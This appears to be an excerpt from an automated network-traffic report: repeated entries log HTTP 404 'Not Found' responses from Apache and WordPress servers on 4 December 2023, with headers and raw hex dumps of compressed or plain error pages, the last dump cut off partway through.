        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Dec 2023 11:04:53 GMTServer: ApacheLast-Modified: Tue, 13 Sep 2022 05:08:13 GMTAccept-Ranges: bytesContent-Length: 1260Connection: closeContent-Type: text/html
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Dec 2023 11:04:56 GMTServer: ApacheLast-Modified: Tue, 13 Sep 2022 05:08:13 GMTAccept-Ranges: bytesContent-Length: 1260Connection: closeContent-Type: text/html
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Dec 2023 11:05:16 GMTServer: Apache/2X-Powered-By: PHP/8.1.25Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-UA-Compatible: IE=edgeLink: <https://mariannaserocka.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-Encoding,User-AgentContent-Encoding: gzipContent-Length: 11321Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 7d db 76 db 48 92 e0 b3 7d 4e fd 03 0c cf d8 64 17 01 02 e0 55 94 e4 1a b7 ed ea ae 29 bb ec 53 72 b5 77 a6 e4 c3 93 04 92 24 2c 10 40 03 a0 28 4a a5 97 79 d9 6f d8 4f d8 e7 7e db b3 4f db d3 ff b5 11 99 09 20 01 82 17 dd aa ad 2a fb 22 01 99 91 11 91 91 91 91 11 79 c3 c1 a3 97 6f 5f bc ff 8f 77 af 94 69 32 f3 9e 3d 3c c0 5f 8a ed 91 38 3e 54 f1 59 55 3c e2 4f 0e d5 d0 d3 de bd 56 11 80 12 e7 d9 c3 07 07 33 9a 10 c5 9e 92 28 a6 c9 a1 fa d3 fb 6f b5 be 8a e9 9e eb 9f 28 11 f5 a0 48 14 8c 5d 8f aa ca 34 a2 63 c4 96 84 f1 a0 d9 9c cc c2 89 1e 44 93 e6 d9 d8 6f 9a 26 14 4a b1 f9 64 46 0f 9f 46 c1 28 48 e2 a7 8a 1d f8 09 f5 93 c3 a7 7e e0 fa 0e 3d 6b 28 e3 c0 f3 82 c5 53 a5 09 6c e4 05 d4 53 97 2e c2 20 4a d4 ac 88 ba 70 9d 64 7a e8 d0 53 d7 a6 1a 7b 69 28 ae ef 26 2e f1 b4 d8 26 1e 3d 34 19 b3 8f 34 4d 79 3f 75 63 25 76 13 aa c0 ef 20 4c dc 99 7b 4e 1d 65 e1 26 53 25 99 52 e5 3f 02 12 27 ca d1 ab b7 4a e8 cd 27 ae af 9c 5a a6 de 51 34 25 ad d0 12 01 74 3b 98 35 17 41 e4 84 11 8d e3 26 07 8d 9b 31 0d 9a 8a a6 21 ad c4 4d 3c fa ec 1d 99 50 c5 0f 12 a8 cc dc 77 00 cb 1b 12 b9 c4 f7 89 72 44 a3 c0 3e 21 07 4d 0e 98 0a 05 a4 18 d2 28 59 1e aa c1 64 e0 05 c8 bc 54 d1 d0 1b 42 b3 a0 44 aa c0 19 26 09 7a 2b f1 b5 98 50 3e 43 14 b7 84 6d 4d e1 d8 8e dc 30 51 92 65 08 6d 43 c2 d0 73 6d 92 b8 81 df f4 9c af 3f c5 81 af a6 ea c5 e4 06 cd 31 a5 33 a2 4d 22 12 4e d5 67 17 ea bf 31 fc 67 89 3a c8 34 86 83 a0 ce a8 0d f5 df 38 e4 e0 67 00 45 1a 00 f7 81 8e 8e 80 3f cc 74 1d a9 dc 4c 30 18 73 fe 58 13 3d 5e d0 51 cc 81 e7 91 b7 05 18 80 58 9d 07 ab 75 6d a8 0e e5 35 85 aa 01 c0 7b 3a 0b 3d 02 4a f4 bd 9b 40 66 38 1f 79 6e 3c a5 91 3a b8 d8 85 2b 51 c7 26 48 1c 44 d4 6c 77 1d d2 35 f7 0c 32 36 69 67 34 ea 77 db e3 7e ab df e9 1b 1d ba 47 ad 8e a5 5e 02 89 00 9b 01 34 fa b9 cd 79 90 24 72 44 49 64 4f 45 46 43 4d 48 34 a1 09 63 45 00 bc f2 93 68 f9 0e 3a 56 c2 05 91 b2 bf 85 cf 6f e2 c3 8b 98 e1 1e 26 34 9a 0d e3 24 72 fd c9 25 b2 f3 d7 39 8d 96 9a eb 87 73 6c ba 88 fe 75 ee 46 d0 8d 58 17 5d 2d a2 5e 7e 6c a8 ae ff 1a 6c cb 1c 94 12 4a 70 03 73 d9 c8 78 fc 59 7d c7 84 01 0c be 8d 26 c4 77 cf 99 1a a9 1f 77 6a e6 ab 0a 34 6b 69 e2 cc 5c a4 e9 ce 18 5f b9 c8 be c3 84 b7 a3 4f d4 46 99 55 f0 7e 1d be 18 95 e6 4e ca b8 08 35 d1 f5 9a f3 d0 0b 88 13 37 2d c3 6a 35 4d a3 69 43 57 0d a9 a3 19 86 39 a4 0e 68 b7 a3 75 f4 4f 21 76 17 51 e4 a7 3b 42 cf 6c ab 3a e8 98 56 43 9d 52 77 32 4d c4 8b 4d d2 9e c1 05 0a 1a e2 05 93 Data Ascii: }vH}NdU)Srw
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Dec 2023 11:05:18 GMTServer: Apache/2X-Powered-By: PHP/8.1.25Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-UA-Compatible: IE=edgeLink: <https://mariannaserocka.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-Encoding,User-AgentContent-Encoding: gzipContent-Length: 11321Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 7d db 76 db 48 92 e0 b3 7d 4e fd 03 0c cf d8 64 17 01 02 e0 55 94 e4 1a b7 ed ea ae 29 bb ec 53 72 b5 77 a6 e4 c3 93 04 92 24 2c 10 40 03 a0 28 4a a5 97 79 d9 6f d8 4f d8 e7 7e db b3 4f db d3 ff b5 11 99 09 20 01 82 17 dd aa ad 2a fb 22 01 99 91 11 91 91 91 91 11 79 c3 c1 a3 97 6f 5f bc ff 8f 77 af 94 69 32 f3 9e 3d 3c c0 5f 8a ed 91 38 3e 54 f1 59 55 3c e2 4f 0e d5 d0 d3 de bd 56 11 80 12 e7 d9 c3 07 07 33 9a 10 c5 9e 92 28 a6 c9 a1 fa d3 fb 6f b5 be 8a e9 9e eb 9f 28 11 f5 a0 48 14 8c 5d 8f aa ca 34 a2 63 c4 96 84 f1 a0 d9 9c cc c2 89 1e 44 93 e6 d9 d8 6f 9a 26 14 4a b1 f9 64 46 0f 9f 46 c1 28 48 e2 a7 8a 1d f8 09 f5 93 c3 a7 7e e0 fa 0e 3d 6b 28 e3 c0 f3 82 c5 53 a5 09 6c e4 05 d4 53 97 2e c2 20 4a d4 ac 88 ba 70 9d 64 7a e8 d0 53 d7 a6 1a 7b 69 28 ae ef 26 2e f1 b4 d8 26 1e 3d 34 19 b3 8f 34 4d 79 3f 75 63 25 76 13 aa c0 ef 20 4c dc 99 7b 4e 1d 65 e1 26 53 25 99 52 e5 3f 02 12 27 ca d1 ab b7 4a e8 cd 27 ae af 9c 5a a6 de 51 34 25 ad d0 12 01 74 3b 98 35 17 41 e4 84 11 8d e3 26 07 8d 9b 31 0d 9a 8a a6 21 ad c4 4d 3c fa ec 1d 99 50 c5 0f 12 a8 cc dc 77 00 cb 1b 12 b9 c4 f7 89 72 44 a3 c0 3e 21 07 4d 0e 98 0a 05 a4 18 d2 28 59 1e aa c1 64 e0 05 c8 bc 54 d1 d0 1b 42 b3 a0 44 aa c0 19 26 09 7a 2b f1 b5 98 50 3e 43 14 b7 84 6d 4d e1 d8 8e dc 30 51 92 65 08 6d 43 c2 d0 73 6d 92 b8 81 df f4 9c af 3f c5 81 af a6 ea c5 e4 06 cd 31 a5 33 a2 4d 22 12 4e d5 67 17 ea bf 31 fc 67 89 3a c8 34 86 83 a0 ce a8 0d f5 df 38 e4 e0 67 00 45 1a 00 f7 81 8e 8e 80 3f cc 74 1d a9 dc 4c 30 18 73 fe 58 13 3d 5e d0 51 cc 81 e7 91 b7 05 18 80 58 9d 07 ab 75 6d a8 0e e5 35 85 aa 01 c0 7b 3a 0b 3d 02 4a f4 bd 9b 40 66 38 1f 79 6e 3c a5 91 3a b8 d8 85 2b 51 c7 26 48 1c 44 d4 6c 77 1d d2 35 f7 0c 32 36 69 67 34 ea 77 db e3 7e ab df e9 1b 1d ba 47 ad 8e a5 5e 02 89 00 9b 01 34 fa b9 cd 79 90 24 72 44 49 64 4f 45 46 43 4d 48 34 a1 09 63 45 00 bc f2 93 68 f9 0e 3a 56 c2 05 91 b2 bf 85 cf 6f e2 c3 8b 98 e1 1e 26 34 9a 0d e3 24 72 fd c9 25 b2 f3 d7 39 8d 96 9a eb 87 73 6c ba 88 fe 75 ee 46 d0 8d 58 17 5d 2d a2 5e 7e 6c a8 ae ff 1a 6c cb 1c 94 12 4a 70 03 73 d9 c8 78 fc 59 7d c7 84 01 0c be 8d 26 c4 77 cf 99 1a a9 1f 77 6a e6 ab 0a 34 6b 69 e2 cc 5c a4 e9 ce 18 5f b9 c8 be c3 84 b7 a3 4f d4 46 99 55 f0 7e 1d be 18 95 e6 4e ca b8 08 35 d1 f5 9a f3 d0 0b 88 13 37 2d c3 6a 35 4d a3 69 43 57 0d a9 a3 19 86 39 a4 0e 68 b7 a3 75 f4 4f 21 76 17 51 e4 a7 3b 42 cf 6c ab 3a e8 98 56 43 9d 52 77 32 4d c4 8b 4d d2 9e c1 05 0a 1a e2 05 93 Data Ascii: }vH}NdU)Srw
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Dec 2023 11:05:21 GMTServer: Apache/2X-Powered-By: PHP/8.1.25Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-UA-Compatible: IE=edgeLink: <https://mariannaserocka.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-Encoding,User-AgentContent-Encoding: gzipContent-Length: 11321Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 7d db 76 db 48 92 e0 b3 7d 4e fd 03 0c cf d8 64 17 01 02 e0 55 94 e4 1a b7 ed ea ae 29 bb ec 53 72 b5 77 a6 e4 c3 93 04 92 24 2c 10 40 03 a0 28 4a a5 97 79 d9 6f d8 4f d8 e7 7e db b3 4f db d3 ff b5 11 99 09 20 01 82 17 dd aa ad 2a fb 22 01 99 91 11 91 91 91 91 11 79 c3 c1 a3 97 6f 5f bc ff 8f 77 af 94 69 32 f3 9e 3d 3c c0 5f 8a ed 91 38 3e 54 f1 59 55 3c e2 4f 0e d5 d0 d3 de bd 56 11 80 12 e7 d9 c3 07 07 33 9a 10 c5 9e 92 28 a6 c9 a1 fa d3 fb 6f b5 be 8a e9 9e eb 9f 28 11 f5 a0 48 14 8c 5d 8f aa ca 34 a2 63 c4 96 84 f1 a0 d9 9c cc c2 89 1e 44 93 e6 d9 d8 6f 9a 26 14 4a b1 f9 64 46 0f 9f 46 c1 28 48 e2 a7 8a 1d f8 09 f5 93 c3 a7 7e e0 fa 0e 3d 6b 28 e3 c0 f3 82 c5 53 a5 09 6c e4 05 d4 53 97 2e c2 20 4a d4 ac 88 ba 70 9d 64 7a e8 d0 53 d7 a6 1a 7b 69 28 ae ef 26 2e f1 b4 d8 26 1e 3d 34 19 b3 8f 34 4d 79 3f 75 63 25 76 13 aa c0 ef 20 4c dc 99 7b 4e 1d 65 e1 26 53 25 99 52 e5 3f 02 12 27 ca d1 ab b7 4a e8 cd 27 ae af 9c 5a a6 de 51 34 25 ad d0 12 01 74 3b 98 35 17 41 e4 84 11 8d e3 26 07 8d 9b 31 0d 9a 8a a6 21 ad c4 4d 3c fa ec 1d 99 50 c5 0f 12 a8 cc dc 77 00 cb 1b 12 b9 c4 f7 89 72 44 a3 c0 3e 21 07 4d 0e 98 0a 05 a4 18 d2 28 59 1e aa c1 64 e0 05 c8 bc 54 d1 d0 1b 42 b3 a0 44 aa c0 19 26 09 7a 2b f1 b5 98 50 3e 43 14 b7 84 6d 4d e1 d8 8e dc 30 51 92 65 08 6d 43 c2 d0 73 6d 92 b8 81 df f4 9c af 3f c5 81 af a6 ea c5 e4 06 cd 31 a5 33 a2 4d 22 12 4e d5 67 17 ea bf 31 fc 67 89 3a c8 34 86 83 a0 ce a8 0d f5 df 38 e4 e0 67 00 45 1a 00 f7 81 8e 8e 80 3f cc 74 1d a9 dc 4c 30 18 73 fe 58 13 3d 5e d0 51 cc 81 e7 91 b7 05 18 80 58 9d 07 ab 75 6d a8 0e e5 35 85 aa 01 c0 7b 3a 0b 3d 02 4a f4 bd 9b 40 66 38 1f 79 6e 3c a5 91 3a b8 d8 85 2b 51 c7 26 48 1c 44 d4 6c 77 1d d2 35 f7 0c 32 36 69 67 34 ea 77 db e3 7e ab df e9 1b 1d ba 47 ad 8e a5 5e 02 89 00 9b 01 34 fa b9 cd 79 90 24 72 44 49 64 4f 45 46 43 4d 48 34 a1 09 63 45 00 bc f2 93 68 f9 0e 3a 56 c2 05 91 b2 bf 85 cf 6f e2 c3 8b 98 e1 1e 26 34 9a 0d e3 24 72 fd c9 25 b2 f3 d7 39 8d 96 9a eb 87 73 6c ba 88 fe 75 ee 46 d0 8d 58 17 5d 2d a2 5e 7e 6c a8 ae ff 1a 6c cb 1c 94 12 4a 70 03 73 d9 c8 78 fc 59 7d c7 84 01 0c be 8d 26 c4 77 cf 99 1a a9 1f 77 6a e6 ab 0a 34 6b 69 e2 cc 5c a4 e9 ce 18 5f b9 c8 be c3 84 b7 a3 4f d4 46 99 55 f0 7e 1d be 18 95 e6 4e ca b8 08 35 d1 f5 9a f3 d0 0b 88 13 37 2d c3 6a 35 4d a3 69 43 57 0d a9 a3 19 86 39 a4 0e 68 b7 a3 75 f4 4f 21 76 17 51 e4 a7 3b 42 cf 6c ab 3a e8 98 56 43 9d 52 77 32 4d c4 8b 4d d2 9e c1 05 0a 1a e2 05 93 Data Ascii: }vH}NdU)Srw
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Dec 2023 11:05:30 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Dec 2023 11:05:33 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Dec 2023 11:05:35 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Dec 2023 11:05:38 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Dec 2023 11:05:44 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 33 34 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 75 54 4d 6f db 38 10 bd fb 57 4c 75 c9 c5 92 9a 6d 16 58 74 6d 03 6d ec 45 0c a4 4d 90 a8 28 72 a4 a5 91 45 84 e2 68 c9 51 14 01 fd 43 39 ef 4f c8 1f db a1 68 67 d3 8f 3d d1 a4 e6 bd 99 f7 66 c6 8b 37 eb ab f3 e2 ee 7a 03 17 c5 a7 4b b8 fe f2 f1 72 7b 0e 49 9a e7 5f df 9d e7 f9 ba 58 c7 0f 67 d9 db d3 3c df 7c 4e 20 69 98 bb f7 79 3e 0c 43 36 bc cb c8 ed f3 e2 26 6f b8 35 67 b9 67 a7 4b ce 2a ae 92 d5 6c 11 de c0 28 bb 5f 26 b5 9b 1e 50 55 f2 de 22 2b 08 2c 29 fe dd eb 87 65 72 4e 96 d1 72 5a 8c 1d 26 50 c6 db 32 61 7c e4 89 f8 4f 28 1b e5 3c f2 b2 e7 3a fd 23 50 4d 1c 56 b5 b8 4c 1c ed 88 fd 2b 9c 25 8b 73 4b da 56 f8 28 67 4d c6 d0 f0 02 7a 9d b8 54 65 83 69 48 e8 c8 7c c7 90 4e 9f 7e 09 ea 9c da b7 ea 7f a2 8b 6d 71 b9 59 9d bd 3d 83 cf c4 f0 17 f5 b6 5a e4 f1 71 b6 c8 2f 36 1f d6 52 fc c7 ab f5 9d 1c 17 a7 ab 57 41 72 9b 15 0d 82 13 53 d0 33 56 50 51 d9 b7 e2 0b 0c ca 83 15 ba 3a d0 01 59 e0 46 7b f0 e8 1e d0 65 b3 c5 75 e0 ba 39 12 5a 28 1c f5 0f cf 4f 92 4e 28 2f f1 3f 9e 0a 5b 65 ab e7 27 b0 27 0a 3a 21 7d 7e 62 b9 89 f8 10 0f be 77 50 62 e4 ed 7f 26 86 8d 9d 9c 52 15 45 ea 8d 79 a1 26 f0 64 74 a9 59 3e 4a a9 c2 01 18 a3 9f ff 91 5f 10 04 4d c4 ba a2 ef 98 3f ac d7 37 9b db db d5 ec 2b ee e0 76 52 04 4a 14 cb 70 a9 91 58 f4 e2 e0 34 a3 cf 4a 6a 01 be 01 5c d3 80 4e dc d9 8d 53 94 19 7c 56 3b f1 f6 85 69 91 1f fc cd c3 48 af 66 b3 c5 9b 34 9d 01 40 0a 5f 6c 4d 4e 48 15 a3 19 e7 f0 49 97 8e 3c d5 0c 8d 98 a1 aa 4a 68 15 94 06 c5 57 b0 38 44 50 52 a3 e2 de c9 64 32 c1 56 26 d5 59 64 d8 3c 76 86 9c f8 0f db 5a fa 81 10 a6 15 a8 8e 18 25 92 9d 23 77 e2 a1 45 ef d5 1e 41 3a 96 30 89 35 ad 32 26 99 83 ef b0 d4 b5 2e e5 36 46 90 91 48 a1 12 ec ef a7 bf 89 3e 51 3d ff 39 a1 0c 88 54 63 7d c4 68 f6 40 c3 21 db 31 57 06 77 d4 43 29 44 21 32 50 86 ca ea 79 84 ec 7a 06 cd 52 59 27 4c 3c 4a fb 75 79 2f 07 41 2d 2b 03 7e d0 5c 36 82 36 06 ab 88 48 a4 66 c7 51 d1 31 87 4f 32 28 02 71 8b ca 4a 9d 54 cb e2 f6 b2 a4 87 2c 53 52 df 88 dd 3f e0 40 39 94 31 b3 5e dc 9b ba 58 61 ad 7a c3 59 cc b5 dd de 82 32 83 1a fd 51 e8 8f f8 89 39 90 18 b2 fb 08 42 4b fd be 09 12 5a 75 8f bf f0 ac 51 5d 37 86 82 31 02 06 72 f7 4a c6 5e f4 4a 5f 0e 46 78 dd 76 06 df cb 66 54 53 47 a7 0e c6 f8 63 13 c5 9b 46 46 64 a7 f7 a2 b6 9d 96 d3 68 c9 38 2d a4 a4 ef 7a df 88 b9 11 44 61 8c c2 68 d4 fa 01 a1 91 64 41 b1 6c 20 f0 80 46 9e a6 16 43 ab ad 6e fb f6 a0 ff ea c5 c7 a9 6f d2 26 7c 54 25 1b 99 f6 e0 f6 48 fd 89 48 77 f2 4f aa 8f ea 9d de 37 2c 5b 37 44 8a 74 35 fb 17 f8 f5 91 1f d6 05 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 34cuTMo8WLumXtmmEM(rEhQC9Ohg=f7zKr{I_Xg<|N iy>C6&o5ggK*l(_&PU"+,)erNrZ&P2a|O(<:#PMVL+%sKV(gMzTeiH|N~
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Dec 2023 11:05:47 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 33 34 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 75 54 4d 6f db 38 10 bd fb 57 4c 75 c9 c5 92 9a 6d 16 58 74 6d 03 6d ec 45 0c a4 4d 90 a8 28 72 a4 a5 91 45 84 e2 68 c9 51 14 01 fd 43 39 ef 4f c8 1f db a1 68 67 d3 8f 3d d1 a4 e6 bd 99 f7 66 c6 8b 37 eb ab f3 e2 ee 7a 03 17 c5 a7 4b b8 fe f2 f1 72 7b 0e 49 9a e7 5f df 9d e7 f9 ba 58 c7 0f 67 d9 db d3 3c df 7c 4e 20 69 98 bb f7 79 3e 0c 43 36 bc cb c8 ed f3 e2 26 6f b8 35 67 b9 67 a7 4b ce 2a ae 92 d5 6c 11 de c0 28 bb 5f 26 b5 9b 1e 50 55 f2 de 22 2b 08 2c 29 fe dd eb 87 65 72 4e 96 d1 72 5a 8c 1d 26 50 c6 db 32 61 7c e4 89 f8 4f 28 1b e5 3c f2 b2 e7 3a fd 23 50 4d 1c 56 b5 b8 4c 1c ed 88 fd 2b 9c 25 8b 73 4b da 56 f8 28 67 4d c6 d0 f0 02 7a 9d b8 54 65 83 69 48 e8 c8 7c c7 90 4e 9f 7e 09 ea 9c da b7 ea 7f a2 8b 6d 71 b9 59 9d bd 3d 83 cf c4 f0 17 f5 b6 5a e4 f1 71 b6 c8 2f 36 1f d6 52 fc c7 ab f5 9d 1c 17 a7 ab 57 41 72 9b 15 0d 82 13 53 d0 33 56 50 51 d9 b7 e2 0b 0c 